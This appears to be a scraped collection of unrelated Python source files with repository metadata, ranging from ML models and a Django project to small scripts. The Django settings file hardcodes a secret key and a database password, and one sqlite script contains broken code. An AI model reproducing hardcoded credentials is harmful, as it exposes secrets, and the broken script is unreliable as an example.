e_max = max(community_number_dict.itervalues())
"When the number of neighboring nodes is less than two, the clustering coefficient is zero"
"TODO:debug"
if len(inner_node_list) <= 2 and len(inner_node_list)>len(external_node_list):
clustering_coefficient = 1
elif len(inner_node_list) <= 2:
clustering_coefficient = 0
else:
"Otherwise, compute the clustering coefficient"
for node_i in inner_node_list:
for node_j in inner_node_list:
if node_i in node_j.neighbors() or node_j in node_i.neighbors():
inner_edges += 1
clustering_coefficient = inner_edges /float( len(inner_node_list) * (len(inner_node_list)-1) )
permanence = len(inner_node_list) / float(e_max * degree_v) - 1 + clustering_coefficient
"""
print "Emax=",e_max,"degree_v=",degree_v,"inner_node=",len(inner_node_list),"clusteringcoe=",clustering_coefficient
"""
return permanence
def permanence_igraph(g,clustering):
'''
This function is used for calculating the permanence of community result.
The input will be igraph classes Graph and VertexClustering.
'''
permanence_sum = 0
for node_v in g.vs:
permanence_sum += permanence_node_igraph(g,clustering,node_v)
return permanence_sum / float(g.vcount()) | [
"fei.jiang1989@gmail.com"
] | fei.jiang1989@gmail.com |
5cf300d98689ea5070ebed56ea833ea47e67eb59 | 9d46c736618aa2637905537571991b2733fb45ff | /Machine learning/best-fit-line.py | e0279b2654ed923ab8d97a13a39a426dd539d3e4 | [] | no_license | rajankumar549/python-lab | be9192d07ad4e791486fdccc891420ccbde7c534 | b841b71ba5a70612e6ea5feb653a5f4d3949f8f3 | refs/heads/master | 2021-01-18T16:57:07.300628 | 2017-08-16T10:27:11 | 2017-08-16T10:27:11 | 100,477,588 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 715 | py | from statistics import mean
import matplotlib.pyplot as plt
import numpy as num
def get_slope(xs,ys):
m=(mean(xs)*mean(ys)-mean(xs*ys))/(mean(xs)**2-mean(xs**2))
b=mean(ys)-m*mean(xs)
return m,b
if __name__=='__main__':
xs=[1,2,3,4,5,6]
ys=[5,4,6,5,6,7]
plt.style.use('fivethirtyeight')
xs= num.array(xs,dtype=num.float64)
ys = num.array(ys, dtype=num.float64)
m,b=get_slope(xs,ys)
reg_line=[m*x+b for x in xs]
plt.scatter(xs, ys,color='black')
plt.plot(xs,reg_line,color='blue')
predicat_x=8
predicat_y=(m*predicat_x)+b
plt.scatter(predicat_x,predicat_y,color='red')
# plt.show()
print(m)
print(b)
#plt.scatter(xs, ys)
#plt.show()
| [
"rajankumar549@gmail.com"
] | rajankumar549@gmail.com |
0f10998dfce475ee752d0584a54d59b17aa336f5 | 1e8b6d1795ffb21029f79aa37ea51c8166aa76fc | /src/resnet.py | 3696e9db6bb77cf05de90276827296789cda7125 | [] | no_license | sinat-jiang/VerificationCodeIdentification | eee309f9656f78492a37026c964cd0fa1da9bdc5 | 86eba7dff1b5733cd54a51843facc1574d29c9ba | refs/heads/master | 2023-04-13T17:43:48.775529 | 2019-12-13T11:05:41 | 2019-12-13T11:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,869 | py | """
resnet 结构网络在当前分类任务中的定制版本
"""
# 实现 ResNet 的基本模块
import torch
from torch import nn
from torch.nn import functional as F
# ResNet 中的基本残差单元
# 通过这里可以看出 pytorch 中允许自定义一个网络子模块,然后指定其 forward 方法,最后可以在主网络中添加该子模块
class ResBlk(nn.Module):
"""
resnet block
"""
def __init__(self, ch_in, ch_out, stride=1):
super(ResBlk, self).__init__()
# 这里的 stride 若在 ResNet18 中传入的为 2,则大概会使图片尺寸成半的减下来
self.conv1 = nn.Conv2d(ch_in, ch_out, kernel_size=3, stride=stride, padding=1)
self.bn1 = nn.BatchNorm2d(ch_out) # batch normalization
# 这一步各参数的设置并不会使图片尺寸发生变化
self.conv2 = nn.Conv2d(ch_out, ch_out, kernel_size=3, stride=1, padding=1)
self.bn2 = nn.BatchNorm2d(ch_out)
self.extra = nn.Sequential()
# shortcut 相当与只有通道数发生了改变,图片大小等均没有变化,
# 且只有输入和输出通道数不一致的情况下才进行了下面的调整(通道数一致的情况下 shortcut 也没必要调整)
# 用 1x1 的卷积,指定的 stride 进行间隔卷积采样,直接将图片尺寸调整为相同
if ch_out != ch_in:
# [b, ch_in, h, w] -> [b, ch_out, h, w]
self.extra = nn.Sequential(
nn.Conv2d(ch_in, ch_out, kernel_size=1, stride=stride),
nn.BatchNorm2d(ch_out)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
# shortcut
# extra model : [b, ch_in, h, w] with [b, ch_out, h, w] 这里要考虑到 ch_in 和 ch_out 可能不一样
# element-wise add:
out = self.extra(x) + out
return out
class ResNet18(nn.Module):
"""
ResNet 的 18 层结构网络的实现
"""
def __init__(self, num_class):
super(ResNet18, self).__init__()
# 注意本次使用的截取后的图片大小为:h x w = 40 x 40
self.conv1 = nn.Sequential(
# [b, 3, 40, 40] => [b, 16, 38, 38]
nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, stride=1, padding=0),
nn.BatchNorm2d(16) # batch normalization 维度要与输出维度相同
)
# followed 4 blocks
# padding = 1, kernel_size = 3
self.blk1 = ResBlk(16, 32, stride=2) # [b, 16, 38, 38] -> [b, 32, 19, 19] # 计算非整数向下取整
self.blk2 = ResBlk(32, 64, stride=2) # [b, 32, 19, 19] -> [b, 64, 10, 10]
self.blk3 = ResBlk(64, 128, stride=2) # [b, 64, 10, 10] -> [b, 128, 5, 5]
self.blk4 = ResBlk(128, 256, stride=2) # [b, 128, 5, 5] -> [b, 256, 3, 3]
# 线性输出层
self.liner = nn.Linear(256*3*3, num_class)
def forward(self, x):
x = F.relu(self.conv1(x))
x = self.blk1(x)
x = self.blk2(x)
x = self.blk3(x)
x = self.blk4(x)
# print('after conv:', x.shape)
# flatting
x = x.view(x.size(0), -1)
# 线性分类
x = self.liner(x)
return x
def main():
# 测试 ResBlk 模块
blk = ResBlk(ch_in=64, ch_out=128) # 仅改变通道数
tmp = torch.randn(2, 64, 40, 40)
out = blk(tmp)
print('block:', out.shape)
# 测试 ResNet18 模型对输入输出的参数是否能正确匹配
model = ResNet18(62) # 指定类别为 62 类
x = torch.randn(2, 3, 40, 40)
out = model(x)
print("resnet:", out.shape)
# 打印模型中总参数量的大小
p = sum(map(lambda p: p.numel(), model.parameters()))
print("parameters size:", p)
if __name__ == '__main__':
main()
| [
"jiangbiao0903@163.com"
] | jiangbiao0903@163.com |
86a5818d0043a344ae72b4203da03fb978aebf6c | 457ac5574b7c2c2022664d29956675c5fb0d74fe | /Problems/Yearly income/task.py | 9560acb39f6d94224d521d27a7b91042b4f25524 | [] | no_license | UlyanaLes/hyperskill_Rock_Paper_Scissors | 5d273a22a8fef33f3795a027e33163f2c5e174d5 | beddbb227733a11d512f01f577811590f96fd5b2 | refs/heads/master | 2022-09-26T05:37:00.180658 | 2020-06-03T20:03:09 | 2020-06-03T20:03:09 | 269,172,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | # write your code here
with open('salary.txt', 'r') as infile, \
open('salary_year.txt', 'w', encoding='utf-8') as outfile:
for line in infile:
print(int(line) * 12, file=outfile)
| [
"ulles91@gmail.com"
] | ulles91@gmail.com |
220ed672271890003ae733c18575bbbb6bd7e81f | 8cdbfe5e78efde3e3020773ea367daf4430becf8 | /user_activity_anomaly/knn.py | eb2b1b0e9261b05760a78bde477d7dbc08c60eb1 | [] | no_license | NatarajanLalgudi/machine-learning-example- | 6358ea294506fd52ad9574cb64b0b82798e65e43 | a0f4071d83df5b3fac27b1eadb4379800775c8a7 | refs/heads/master | 2023-04-07T14:54:35.110161 | 2020-04-02T15:10:53 | 2020-04-02T15:10:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,194 | py | from sklearn.neighbors import KNeighborsClassifier
from sklearn import metrics
from sklearn.model_selection import train_test_split
import pandas as pd
import joblib
import matplotlib.pyplot as plt
df1 = pd.read_csv("D:\\OneDrive\\Machine Learning Reference\\user_good.csv")
df2 = pd.read_csv("D:\\OneDrive\\Machine Learning Reference\\user_bad.csv")
df = pd.concat([df1,df2])
feature_cols = ['isnewuser','isnewip','isvpn','islan','percent','src_ip_c']
X = df[feature_cols]
y = df['tag']
X_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.4)
k_range= range(1,26)
scores = []
for k in k_range:
knn = KNeighborsClassifier(n_neighbors=k)
knn.fit(X_train, y_train)
y_pred = knn.predict(X_test)
scores.append(metrics.f1_score(y_test, y_pred))
targetname = ['Normal','Malicious']
result = metrics.classification_report(y_test,y_pred,target_names=targetname)
matrix = metrics.confusion_matrix(y_test, y_pred, labels = [0,1])
print ('Currently running K:' + str(k))
print (result)
print (matrix)
plt.plot(k_range, scores)
plt.xlabel('Value of K for KNN')
plt.ylabel('Testing F1-Score')
plt.show()
| [
"noreply@github.com"
] | NatarajanLalgudi.noreply@github.com |
fc9dd45534fb6b6e55d49c2ab5ed2c5cc4fdbff6 | 1274a505e78d4daa756bdd28bb04edb65ae3317d | /app.py | 2720f54de3ff8f38b187aef4d752960bec1bd7ee | [] | no_license | Deretaz/ImageScreensaver | 34cb59f1454e0aaf90d89736dc54f2f5cac75876 | 275693a15aa0a7d9a2e464bb5f67120c4cbcb8e4 | refs/heads/master | 2022-01-18T02:31:35.842948 | 2019-07-06T17:36:20 | 2019-07-06T17:36:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,898 | py | import sys
import os
import pygame
import random
import time
import glob
from PIL import Image
from win32.win32api import GetSystemMetrics
def main():
# Center the Screen
os.environ['SDL_VIDEO_CENTERED'] = '1'
# Get screen resolution
screen_resolution = [int(GetSystemMetrics(0)), int(GetSystemMetrics(1))]
screen_offset = [0, 0]
# Reset screen after 300 Images drawn
screen_reset = 300
# Read jpg images from the /image direcotry
image_list = []
for image_file in glob.glob("image/*.jpg"):
image_list.append(image_file)
# Initialize PygGame
pygame.init()
screen = pygame.display.set_mode(screen_resolution, pygame.NOFRAME)
pygame.display.set_caption("Screensaver Image")
pygame.mouse.set_visible(False)
# Initialize Clock
clock = pygame.time.Clock()
# Set first screen background
screen.fill((0, 136, 255))
running = True
while running:
# Limit FPS to 4
clock.tick(4)
# Check for reset fill screen
screen_reset -= 1
if screen_reset <= 0:
# Draw a rect over all to make a blur effect
blur_surface = pygame.Surface((screen_resolution[0], screen_resolution[1]))
blur_color = ((random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)))
for alpha in range(100):
blur_surface.set_alpha(alpha)
blur_surface.fill(blur_color)
screen.blit(blur_surface, (0, 0))
pygame.display.flip()
screen_reset = 300
# Select Random Image from List
image_index = random.randrange(len(image_list))
# Load Image per Pygame.Image.Load
image_py_loaded = pygame.image.load(image_list[image_index])
image_py_rect = image_py_loaded.get_rect()
# Allow Pictures to be offset to top, left, right and bottom
screen_offset[0] = random.randint(-100, screen_resolution[0] - image_py_rect[2] + 100)
screen_offset[1] = random.randint(-100, screen_resolution[1] - image_py_rect[3] + 100)
# Set Random x and y position of the image
image_py_rect[0] = screen_offset[0]
image_py_rect[1] = screen_offset[1]
# Draw image to screen
screen.blit(image_py_loaded, image_py_rect)
# Display screen content
pygame.display.flip()
### For closing the window # Don't change anything beyond this line ###
for event in pygame.event.get():
# Close game if a pygame.QUIT event is in queue
if event.type == pygame.QUIT:
running = False
# Close game if ESC is pressed
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
pygame.event.post(pygame.event.Event(pygame.QUIT))
if __name__ == '__main__':
main()
| [
"benjamin.sobe@codersgen.de"
] | benjamin.sobe@codersgen.de |
520e94135de20c0dd4494037fc3290ebd531396f | 9a72d97ec915829889ccc29c02f37d3672d363a5 | /CcloudTv.bundle/Contents/Libraries/Shared/streamlink/plugins/speedrunslive.py | feb1df0e5f78bdb03bffbc19a1347075ab7faefb | [] | no_license | alex-alex2006hw/plex-plug-ins | 64a63ddfb8b990a2499b62247a3a5824515339fb | 4d2e7be53dfffb02666ff2791fc0bc94cd6b396d | refs/heads/master | 2021-04-09T17:18:24.619889 | 2018-03-18T22:25:16 | 2018-03-18T22:25:16 | 125,717,739 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 517 | py | import re
from streamlink.plugin import Plugin
TWITCH_URL_FORMAT = "http://www.twitch.tv/{0}"
_url_re = re.compile("http://(?:www\.)?speedrunslive.com/#!/(?P<user>\w+)")
class SpeedRunsLive(Plugin):
@classmethod
def can_handle_url(self, url):
return _url_re.match(url)
def _get_streams(self):
match = _url_re.match(self.url)
username = match.group("user")
url = TWITCH_URL_FORMAT.format(username)
return self.session.streams(url)
__plugin__ = SpeedRunsLive
| [
"alex2006hw@gmail.com"
] | alex2006hw@gmail.com |
e0bd3ed5653ee04033e69979c01df42beabf0916 | 2e0a4d35ef1d42523ec7d76f85a1b57002a2562e | /Python3.5/Head first Exercise/Exercise/webapp/cgi-bin/initdbtimingdata.py | 0c6ad0d0ee1819e675ef342d26beccfef5fe1730 | [] | no_license | starVader/Python | de7b930346f996181d8bf4f5eec37ffba5a2736b | 347b2289c86ffafab19681ddbc990064b6e13fe0 | refs/heads/master | 2021-01-10T03:42:57.589362 | 2016-02-17T05:19:41 | 2016-02-17T05:19:41 | 48,681,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | import sqlite3
connection = sqlite.connect('coach.sqlite')
cursor = connection.cursor()
import glob
data_files = glob.glob("../data/*.txt")
athletes = athletemodel.put_to_store(data_files)
for each in athletes:
time = athletes[each].times
cursor.execute("INSERT INTO timing_data(times) VALUE(?)",(times))
connection.commit()
connection.close() | [
"starvader473@gmail.com"
] | starvader473@gmail.com |
d9e6bf00ca6abe565d935cf41b72703f7ac8a861 | 8370b4ae01178a5e28460ff27f4a9a0065b5745f | /config.py | 0a18d7ca43cceaf7ca0336b1da55e6aee5560147 | [] | no_license | peindunk/hardcore_tv | 1ace823b6c33c2db92396a34474f8432aeead879 | 9184d9539b4fbee72461f3a702a872424fd27254 | refs/heads/master | 2022-12-10T01:34:14.425308 | 2019-01-21T01:15:41 | 2019-01-21T01:15:41 | 161,636,491 | 0 | 0 | null | 2022-12-08T01:20:15 | 2018-12-13T12:32:27 | JavaScript | UTF-8 | Python | false | false | 639 | py | # -*- coding:utf-8 -*-
'''
https://www.jianshu.com/p/7e16877757f8
'''
zq_api = "rtmp://txrtmp.cdn.zhanqi.tv/zqlive/"
SECRET_KEY = 'hardcore_tv'
pcgame = ['英雄联盟','DNF','绝地求生','魔兽世界','DOTA2',\
'梦三国2','守望先锋','三国杀','梦幻西游','传奇','暴雪游戏']
videoGame = ['主机游戏','火影忍者']
mobileGame = ['CF手游','热门手游','王者荣耀','吃鸡手游','第五人格','狼人杀']
entertainment = ['百变娱乐','游戏放映室']
notice_quit = '''您已退出当前账号... < br >
即将为您返回主页...'''
notice_login = '''登录成功 即将返回主页''' | [
"413447197@qq.com"
] | 413447197@qq.com |
9f164b011736f56f17f02abad61284630861b3ce | e9b7d1c8fe62a9cc0f96141b13902d95ca736baf | /django/mysite/mysite/settings.py | 4397713e968d26dfb596b1b30532aec72bc78fd2 | [] | no_license | andybao/daily_work | 26d5aee8b47b898cd6672afa927827ede789548d | b71850fbe978ed1ce2945a7d55d5dea6fbd13483 | refs/heads/master | 2022-12-22T04:13:21.701101 | 2020-04-12T13:54:23 | 2020-04-12T13:54:23 | 184,680,151 | 0 | 0 | null | 2022-12-11T01:24:59 | 2019-05-03T00:59:46 | Python | UTF-8 | Python | false | false | 3,294 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'y_aqfd137-_aba)u1)i8%9lvu$!b74@(*z^z=b(3a2c+l(r@w_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'polls.apps.PollsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME' : 'hisdb',
'USER' : 'auto_tester@chainvu.com',
'PASSWORD' : 'dysan200'
},
'sqlite': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"wenyu.bao@gmail.com"
] | wenyu.bao@gmail.com |
77b43d7d9cd6b912bcee471c564b47d7a7cdd552 | 63944fb28b938e30ca5c831edce8bd2d643aaef6 | /forms.py | f3a30f3222b762ce75ea2c2eb55a4caabe9b859d | [] | no_license | Saptak625/BoldifyAWSPipline | 35cf76a83dcb4730b031a434b45abf3aac9a56b4 | f35bed14307f2dcc71daf0882ded6af5eb3748b9 | refs/heads/main | 2023-06-06T21:30:56.036420 | 2021-07-01T16:51:02 | 2021-07-01T16:51:02 | 382,098,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired, Length
from flask_ckeditor import CKEditorField
class BoldifyEncryptForm(FlaskForm):
boldMessage = StringField('Bolded Message: ',
validators=[DataRequired()])
submit = SubmitField('Submit') | [
"24sdas@student.dasd.org"
] | 24sdas@student.dasd.org |
f1f4be0600c0a96312d2b00339681c2c5efff41b | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_cackles.py | b56545b1c6dceb5e279e87bc0ba44c4f57263de2 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py |
#calss header
class _CACKLES():
def __init__(self,):
self.name = "CACKLES"
self.definitions = cackle
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['cackle']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
0f7ddbc55809f101e6c51e745fc682ec6439b74a | edbf8601ae771031ad8ab27b19c2bf450ca7df76 | /283-Move-Zeroes/MoveZeroes.py | b7e24b42230eae378975aceeeb96569feb6628fa | [] | no_license | gxwangdi/Leetcode | ec619fba272a29ebf8b8c7f0038aefd747ccf44a | 29c4c703d18c6ff2e16b9f912210399be427c1e8 | refs/heads/master | 2022-07-02T22:08:32.556252 | 2022-06-21T16:58:28 | 2022-06-21T16:58:28 | 54,813,467 | 3 | 2 | null | 2022-06-21T16:58:29 | 2016-03-27T05:02:36 | Java | UTF-8 | Python | false | false | 548 | py | class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
if not nums or len(nums)<2:
return
slow=0
fast=0
size=len(nums)
while fast < size:
if nums[fast]==0:
fast+=1
continue
nums[slow] = nums[fast]
slow+=1
fast+=1
while slow < size:
nums[slow] =0
slow+=1
| [
"gxwangdi@gmail.com"
] | gxwangdi@gmail.com |
d00e8228569d9fb43bc734b6edf4821d25af7ce6 | 640e7bc10ceaf1343327feb8b7b6f83fc1f0be60 | /deeprl_hw2/preprocessors.py | fbef69beca884d71e21f96e5ab0deb6ccab6de12 | [] | no_license | MightyChaos/deepRL_DQN | b2d19201610ac3671060ce9841f643c1c20c0ab1 | 70484095c3b71d893678a43e1d0aed4716811a79 | refs/heads/master | 2021-01-23T01:01:31.522798 | 2017-03-30T02:40:18 | 2017-03-30T02:40:18 | 85,863,284 | 0 | 0 | null | 2017-03-22T18:37:02 | 2017-03-22T18:37:02 | null | UTF-8 | Python | false | false | 6,198 | py | """Suggested Preprocessors."""
import numpy as np
from PIL import Image
from deeprl_hw2 import utils
from deeprl_hw2.core import Preprocessor
from collections import deque
class HistoryPreprocessor(Preprocessor):
"""Keeps the last k states.
Useful for domains where you need velocities, but the state
contains only positions.
When the environment starts, this will just fill the initial
sequence values with zeros k times.
Parameters
----------
history_length: int
Number of previous states to prepend to state being processed.
"""
def __init__(self, history_length=3):
self.history_length = history_length
self.initial_list = [np.zeros([84,84])] * history_length
self.queue = deque(self.initial_list, maxlen=history_length)
pass
def process_state_for_network(self, state):
"""You only want history when you're deciding the current action to take."""
all_states = list(self.queue) + [state]
self.queue.append(state)
processed_states = np.array(all_states, dtype=np.float32)
processed_states = np.swapaxes(processed_states, 0, 2)
processed_states = np.swapaxes(processed_states, 0, 1)
return processed_states
def reset(self):
self.queue = deque(self.initial_list, maxlen=self.history_length)
"""Reset the history sequence.
Useful when you start a new episode.
"""
return
def get_config(self):
return {'history_length': self.history_length}
class AtariPreprocessor(Preprocessor):
"""Converts images to greyscale and downscales.
Based on the preprocessing step described in:
@article{mnih15_human_level_contr_throug_deep_reinf_learn,
author = {Volodymyr Mnih and Koray Kavukcuoglu and David
Silver and Andrei A. Rusu and Joel Veness and Marc
G. Bellemare and Alex Graves and Martin Riedmiller
and Andreas K. Fidjeland and Georg Ostrovski and
Stig Petersen and Charles Beattie and Amir Sadik and
Ioannis Antonoglou and Helen King and Dharshan
Kumaran and Daan Wierstra and Shane Legg and Demis
Hassabis},
title = {Human-Level Control Through Deep Reinforcement
Learning},
journal = {Nature},
volume = 518,
number = 7540,
pages = {529-533},
year = 2015,
doi = {10.1038/nature14236},
url = {http://dx.doi.org/10.1038/nature14236},
}
You may also want to max over frames to remove flickering. Some
games require this (based on animations and the limited sprite
drawing capabilities of the original Atari).
Parameters
----------
new_size: 2 element tuple
The size that each image in the state should be scaled to. e.g
(84, 84) will make each image in the output have shape (84, 84).
"""
def __init__(self, new_size):
self.new_size = new_size
pass
def process_state_for_memory(self, state):
"""Scale, convert to greyscale and store as uint8.
We don't want to save floating point numbers in the replay
memory. We get the same resolution as uint8, but use a quarter
to an eigth of the bytes (depending on float32 or float64)
We recommend using the Python Image Library (PIL) to do the
image conversions.
"""
im = Image.fromarray(state,'RGB')
im = im.convert('L')
im = im.resize(self.new_size, Image.BILINEAR)
processed_state = np.array(im.getdata(), dtype=np.uint8).reshape(im.size[0], im.size[1])
return processed_state
def process_state_for_network(self, state):
"""Scale, convert to greyscale and store as float32.
Basically same as process state for memory, but this time
outputs float32 images.
"""
im = Image.fromarray(state,'RGB')
im = im.convert('L')
im = im.resize(self.new_size, Image.BILINEAR)
processed_state = np.array(im.getdata(), dtype=np.float32).reshape(im.size[0], im.size[1])
return processed_state
def process_batch(self, samples):
"""The batches from replay memory will be uint8, convert to float32.
Same as process_state_for_network but works on a batch of
samples from the replay memory. Meaning you need to convert
both state and next state values.
"""
processed_samples = []
for i, sample in enumerate(samples):
processed_sample = sample
processed_sample.state = np.array(sample.state, dtype=np.float32)
processed_sample.next_state = np.array(sample.next_state, dtype=np.float32)
processed_samples.append(processed_sample)
return processed_samples
def process_reward(self, reward):
"""Clip reward between -1 and 1."""
processed_reward = 0
if reward > 0:
processed_reward = 1
elif reward < 0:
processed_reward = -1
return processed_reward
class PreprocessorSequence(Preprocessor):
"""You may find it useful to stack multiple prepcrocesosrs (such as the History and the AtariPreprocessor).
You can easily do this by just having a class that calls each preprocessor in succession.
For example, if you call the process_state_for_network and you
have a sequence of AtariPreproccessor followed by
HistoryPreprocessor. This this class could implement a
process_state_for_network that does something like the following:
state = atari.process_state_for_network(state)
return history.process_state_for_network(state)
"""
#preprocessors: a list to preprocessors to call
def __init__(self, preprocessors):
self.atari = preprocessors[0]
self.history = preprocessors[1]
def reset(self):
self.history.reset()
def process_state_for_network(self, state):
state = self.atari.process_state_for_network(state)
return self.history.process_state_for_network(state)
def process_reward(self, reward):
return self.atari.process_reward(reward) | [
"yangluonaluna@gmail.com"
] | yangluonaluna@gmail.com |
ad4a9ade81342bbd4739b4c548e4166cf5f70c76 | ddcbb3efa6dcf72e1e704bd811666721d966678c | /fuselage/models.py | 3035a7dcc58dea3e04c561c0326f235fa03c67c0 | [] | no_license | mattdeboard/planecrash | 20e402bb5ec506e0c140cdf95f11937b3f268659 | e6e86fa1866dba00e175aa9e4637f5aeaf098f65 | refs/heads/master | 2021-05-01T16:37:15.683734 | 2014-01-28T05:02:01 | 2014-01-28T05:02:01 | 16,116,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,196 | py | from django.db import models
from uuidfield import UUIDField
class ArticleManager(models.Manager):
def by_category(self, short_name, include_unprioritized=False):
"""Retrieve all the articles for a given category short name.
This differs from the standard
`filter(category__short_name='foo')` because it also limits the
number of results to the value of the `seats` property of the
category. If you don't need this limitation applied, just use
`filter(category__short_name='foo')`.
"""
category = Category.objects.get(short_name=short_name)
qs = super(ArticleManager, self).get_queryset()\
.select_related('category')\
.filter(category=category)\
.order_by('priority')
if not include_unprioritized:
qs = qs.exclude(priority=None)
return qs[:category.seats]
class Article(models.Model):
article_uid = UUIDField(auto=True)
category = models.ForeignKey('Category', null=True)
created = models.DateTimeField(auto_now=True, auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
new_headline = models.CharField(max_length=1000, null=True, blank=True)
original_headline = models.CharField(max_length=1000)
priority = models.IntegerField(null=True, blank=True)
url = models.URLField(max_length=2000, unique=True)
objects = ArticleManager()
class Meta:
db_table = 'articles'
def __repr__(self):
return "<Article: uuid:%s>" % self.article_uid
def __unicode__(self):
return self.new_headline or self.original_headline
class Category(models.Model):
seats = models.IntegerField()
title = models.CharField(max_length=20, db_index=True, unique=True)
short_name = models.CharField(max_length=20, db_index=True, unique=True)
priority = models.IntegerField()
class Meta:
db_table = 'categories'
verbose_name_plural = 'Categories'
def __repr__(self):
return "<Category: %s>" % self.title
def __unicode__(self):
return self.title
| [
"matt.deboard@gmail.com"
] | matt.deboard@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.